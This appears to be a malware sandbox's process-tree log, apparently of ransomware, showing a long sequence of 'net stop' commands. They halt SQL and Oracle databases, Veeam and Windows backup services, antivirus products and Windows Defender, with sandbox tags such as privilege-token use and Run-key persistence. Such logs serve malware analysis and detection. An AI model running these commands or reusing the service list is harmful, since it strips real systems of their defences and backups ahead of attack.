C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"3⤵
-
C:\Windows\system32\net.exenet stop "MySQL80"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"3⤵
-
C:\Windows\system32\net.exenet stop "MySQL57"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"3⤵
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"3⤵
-
C:\Windows\system32\net.exenet stop "PDVFSService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"3⤵
-
C:\Windows\system32\net.exenet stop "POP3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"3⤵
-
C:\Windows\system32\net.exenet stop "RESvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"3⤵
-
C:\Windows\system32\net.exenet stop "sacsvr"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"3⤵
-
C:\Windows\system32\net.exenet stop "SamSs"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"3⤵
-
C:\Windows\system32\net.exenet stop "SAVAdminService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"3⤵
-
C:\Windows\system32\net.exenet stop "SAVService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"3⤵
-
C:\Windows\system32\net.exenet stop "Smcinst"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"3⤵
-
C:\Windows\system32\net.exenet stop "SmcService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SMTPSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"3⤵
-
C:\Windows\system32\net.exenet stop "SNAC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"3⤵
-
C:\Windows\system32\net.exenet stop "SntpService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"3⤵
-
C:\Windows\system32\net.exenet stop "sophossps"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵
- Adds Run key to start application
-
C:\Windows\system32\net.exenet stop "W3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"3⤵
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"3⤵
-
C:\Windows\system32\net.exenet stop "EhttpSrv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"3⤵
-
C:\Windows\system32\net.exenet stop "ekrn"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"3⤵
-
C:\Windows\system32\net.exenet stop "ESHASRV"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "AVP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"3⤵
-
C:\Windows\system32\net.exenet stop "klnagent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"3⤵
-
C:\Windows\system32\net.exenet stop "HvHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"3⤵
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"3⤵
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"3⤵
-
C:\Windows\system32\net.exenet stop "vmicshutdown"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"3⤵
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"3⤵
-
C:\Windows\system32\net.exenet stop "vmcompute"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvmsession"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"3⤵
-
C:\Windows\system32\net.exenet stop "vmicrdv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"3⤵
-
C:\Windows\system32\net.exenet stop "vmictimesync"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvss"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"3⤵
-
C:\Windows\system32\net.exenet stop "VMAuthdService"4⤵
- Drops startup file
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"3⤵
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"3⤵
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"3⤵
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"3⤵
-
C:\Windows\system32\net.exenet stop "VMwareHostd"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"3⤵
- Adds Run key to start application
-
C:\Windows\system32\net.exenet stop "Sense"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"3⤵
-
C:\Windows\system32\net.exenet stop "WdNisSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"3⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵
-
